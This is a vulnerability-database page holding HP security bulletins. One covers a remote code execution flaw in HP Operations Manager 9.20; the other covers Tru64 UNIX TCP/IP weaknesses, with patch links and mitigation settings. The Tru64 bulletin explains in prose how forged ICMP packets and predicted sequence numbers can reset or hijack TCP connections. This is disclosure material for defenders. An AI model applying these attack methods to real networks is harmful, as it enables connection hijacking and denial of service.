3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlQ1TwsACgkQ4B86/C0qfVnkJgCfevd5vzwuHkW/C2VigZXMkDx3 emMAoPo5hL+fb0wuvT/65VDTrqjXDEY1 =TbvC -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1302",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "operations manager",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "hp",
        "version": "9.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "hp operations manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "9.20"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:kernel:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The vendor reported this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "70353"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-2649",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2014-2649",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 1.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-2649",
            "trust": 1.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201410-191",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. \nFew technical details are currently available. We will update this BID as more information emerges. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04472866\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04472866\nVersion: 1\n\nHPSBMU03127 rev.1 - HP Operations Manager for UNIX, Remote Code Execution\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nReferences: CVE-2014-2648, CVE-2014-2649 (SSRT101727)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates can be downloaded\nfrom HP Software Support Online (SSO). \n\n9.11.120 server patches:  Component\n Download Location\n\nOMHPUX_00004\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188205\n\nITOSOL_00802\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187924\n\nOML_00080\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187666\n\n9.11.120 Java UI patches:  Component\n Download Location\n\nOMHPUX_00005\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187192\n\nITOSOL_00803\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187435\n\nOML_00081\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188103\n\n9.20.300 server patches:  Component\n Download Location\n\nOMHPUX_00006\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188207\n\nITOSOL_00804\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188065\n\nOML_00082\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188209\n\nHISTORY\nVersion:1 (rev.1) - 8 October 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlQ1TwsACgkQ4B86/C0qfVnkJgCfevd5vzwuHkW/C2VigZXMkDx3\nemMAoPo5hL+fb0wuvT/65VDTrqjXDEY1\n=TbvC\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "BID",
        "id": "70353"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-2649",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "70353",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "128616",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "id": "VAR-201410-1302",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.11111111
  },
  "last_update_date": "2022-05-06T13:04:12.653000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HPSBMU03127 SSRT101727",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04472866"
      },
      {
        "title": "ITOSOL_00802",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51824"
      },
      {
        "title": "OML_00081",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51828"
      },
      {
        "title": "OMHPUX_00004",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51823"
      },
      {
        "title": "ITOSOL_00803",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51827"
      },
      {
        "title": "OML_00082",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51831"
      },
      {
        "title": "OMHPUX_00005",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51826"
      },
      {
        "title": "ITOSOL_00804",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51830"
      },
      {
        "title": "OML_00080",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51825"
      },
      {
        "title": "OMHPUX_00006",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51829"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04472866"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2649"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2649"
      },
      {
        "trust": 0.3,
        "url": "https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto\u0026cp=1-11-15-28^1745_4000_100__"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2649"
      },
      {
        "trust": 0.1,
        "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2648"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "70353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-08T00:00:00",
        "db": "BID",
        "id": "70353"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "date": "2014-10-09T23:54:56",
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "date": "2014-10-10T01:55:00",
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-08T00:00:00",
        "db": "BID",
        "id": "70353"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      },
      {
        "date": "2019-10-09T23:10:00",
        "db": "NVD",
        "id": "CVE-2014-2649"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-191"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "UNIX Run on  HP Operations Manager Vulnerable to arbitrary code execution",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004643"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "70353"
      }
    ],
    "trust": 0.3
  }
}

var-200106-0110
Vulnerability from variot

TCP implementations that use random increments for initial sequence numbers (ISN) can allow remote attackers to perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. Attacks against TCP initial sequence number generation have been discussed for some time now. It has long been recognized that the ability to know or predict ISNs can lead to TCP connection hijacking or spoofing. What was not previously illustrated was just how predictable one commonly-used method of randomizing new connection ISNs is in some modern TCP/IP implementations. A vulnerability exists in some TCP/IP stack implementations that use random increments for initial sequence numbers. Such implementations are vulnerable to statistical attack, which could allow an attacker to predict, within a reasonable range, sequence numbers of future and existing connections. By predicting a sequence number, several attacks could be performed; an attacker could disrupt or hijack existing connections, or spoof future connections. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

HP SECURITY BULLETIN

HPSBTU01210 REVISION: 0

SSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of Service (DoS)

NOTICE: There are no restrictions for distribution of this Security Bulletin provided that it remains complete and intact.

The information in this Security Bulletin should be acted upon as soon as possible.

INITIAL RELEASE: 15 July 2005

POTENTIAL SECURITY IMPACT: Remote Denial of Service (DoS)

SOURCE: Hewlett-Packard Company HP Software Security Response Team

VULNERABILITY SUMMARY: Several potential security vulnerabilities have been identified in the HP Tru64 UNIX TCP/IP including ICMP, and Initial Sequence Number generation (ISNs). These exploits could result in a remote Denial of Service (DoS) from network throughput reduction for TCP connections, the reset of TCP connections, or TCP spoofing.

REFERENCES: CERT CA-2001-09, NISCC Vulnerability Advisory VU#498440 VU#532967, CAN-2004-0790 CAN-2004-0791 CAN-2004-1060 CAN-2001-0328

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Tru64 UNIX 5.1B-3 HP Tru64 UNIX 5.1B-2/PK4 HP Tru64 UNIX 5.1A PK HP Tru64 UNIX 4.0G PK4 HP Tru64 UNIX 4.0F PK8

BACKGROUND:

Special Instructions for the Customer

The Internet Control Message Protocol (ICMP) (RFC 792) is used in the Internet Architecture to perform fault-isolation and recovery (RFC816), which is the group of actions that hosts and routers take to determine if a network failure has occurred.

The industry standard TCP specification (RFC 793) has a vulnerability whereby ICMP packets can be used to perform a variety of attacks such as blind connection reset attacks and blind throughput-reduction attacks. Blind connection reset attacks can be triggered by an attacker sending forged ICMP "Destination Unreachable, host unreachable" packets or ICMP "Destination Unreachable, port unreachable" packets. Blind throughput-reduction attacks can be caused by an attacker sending a forged ICMP type 4 (Source Quench) packet.

Path MTU Discovery (RFC 1191) describes a technique for dynamically discovering the MTU (maximum transmission unit) of an arbitrary internet path. This protocol uses ICMP packets from the router to discover the MTU for a TCP connection path. An attacker can reduce the throughput of a TCP connection by sending forged ICMP packets (or their IPv6 counterpart) to the discovering host, causing an incorrect Path MTU setting.

HP has addressed these potential vulnerabilities by providing a new kernel tunable in Tru64 UNIX V5.1B and 5.1A, icmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two new kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. The icmp_rejectcodemask tunable is already available in Tru64 UNIX V5.1B and 5.1A.

icmp_tcpseqcheck

The icmp_tcpseqcheck variable mitigates ICMP attacks against TCP by checking that the TCP sequence number contained in the payload of the ICMP error message is within the range of the data already sent but not yet acknowledged. An ICMP error message that does not pass this check is discarded. This behavior protects TCP against spoofed ICMP packets.

Set the tunable as follows:

icmp_tcpseqcheck=1 (default)

Provides a level of protection that reduces the possibility
of considering a spoofed ICMP packet as valid
to one in two raised to the thirty-second power.

icmp_tcpseqcheck=0

Retains existing behavior, i.e., accepts all ICMP packets

icmp_rejectcodemask

In the Requirements for IP Version 4 Routers (RFC 1812), research suggests that the use of ICMP Source Quench packets is an ineffective (and unfair) antidote for congestion. Thus, HP recommends completely ignoring ICMP Source Quench packets using the icmp_rejectcodemask tunable. The icmp_rejectcodemask is a bitmask that designates the ICMP codes that the system should reject. For example, to reject ICMP Source Quench packets, set the mask bit position for the ICMP_SOURCEQUENCH code 4, which is two to the 4th power = 16 (0x10 hex). The icmp_rejectcodemask tunable can be used to reject any ICMP packet type, or multiple masks can be combined to reject more than one type.

Note: the ICMP type codes are defined in "/usr/include/netinet/ip_icmp.h".

Set the tunable as follows:

icmp_rejectcodemask = 0x10

  Rejects ICMP Source Quench packets

icmp_rejectcodemask = 0 (default)

  Retains existing behavior, i.e., accepts all ICMP packets

Adjusting the variables

The ICMP sequence check variable (icmp_tcpseqcheck) can be adjusted using the sysconfig and sysconfigdb commands:

sysconfig -q inet icmp_tcpseqcheck

inet: icmp_tcpseqcheck = 1

sysconfig -r inet icmp_tcpseqcheck=0

icmp_tcpseqcheck: reconfigured

sysconfig -q inet icmp_tcpseqcheck

inet: icmp_tcpseqcheck = 0

sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge

sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet

sysconfigdb -l inet

inet: icmp_tcpseqcheck = 1

Similarly, the icmp_rejectcodemask variable can be adjusted using the sysconfig and sysconfigdb commands:

sysconfig -q inet icmp_rejectcodemask

inet: icmp_rejectcodemask = 0

sysconfig -r inet icmp_rejectcodemask=0x10

icmp_rejectcodemask: reconfigured

sysconfig -q inet icmp_rejectcodemask

inet: icmp_rejectcodemask = 16

sysconfig -q inet icmp_rejectcodemask

/tmp/icmp_rejectcodemask_merge

sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet

sysconfigdb -l inet

inet: icmp_rejectcodemask = 16

RESOLUTION:

Until the corrections are available in a mainstream release patch kit, HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer.

The ERP kits use dupatch to install and will not install over any installed Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the ERP installation is blocked by any of your installed CSPs.

The fixes contained in the ERP kits are scheduled to be available in the following mainstream patch kits:

HP Tru64 Unix 5.1B-4

Early Release Patches

The ERPs deliver the following file:

/sys/BINARY/inet.mod

HP Tru64 UNIX 5.1B-3 ERP Kit Name: T64KIT0025925-V51BB26-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025925-V51BB26-ES-20050628 MD5 checksum: 129251787a426320af16cd584b982027

HP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name: T64KIT0025924-V51BB25-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025924-V51BB25-ES-20050628 MD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af

HP Tru64 UNIX 5.1A PK6 ERP Kit Name: T64KIT0025922-V51AB24-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025922-V51AB24-ES-20050628 MD5 checksum: 7c373b35c95945651a1cfda96bf71421

HP Tru64 UNIX 4.0G PK4 ERP Kit Name: T64KIT0025920-V40GB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 13849fd555239d75d300d1cb46dc995f

HP Tru64 UNIX 4.0F PK8 ERP Kit Name: DUXKIT0025921-V40FB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 743b614d39f185802701b7f2dd14ffa5

MD5 checksums are available from the ITRC patch database main page: http://www.itrc.hp.com/service/patch/mainPage.do - From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links.

General ITRC Patch Page: http://www.itrc.hp.com/service/patch/mainPage

SUPPORT: For further information, contact normal HP Services support channel.

REPORT: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com. It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To obtain the security-alert PGP key please send an e-mail message to security-alert@hp.com with the Subject of 'get key' (no quotes).

SUBSCRIBE: To initiate a subscription to receive future HP Security Bulletins via Email:

http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA& langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up Under Step1: your IRTC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your IRTC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php

Log in on the web page Subscriber's choice for Business: sign-in. On the Web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://itrc.hp.com/service/cki/secBullArchive.do

  • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

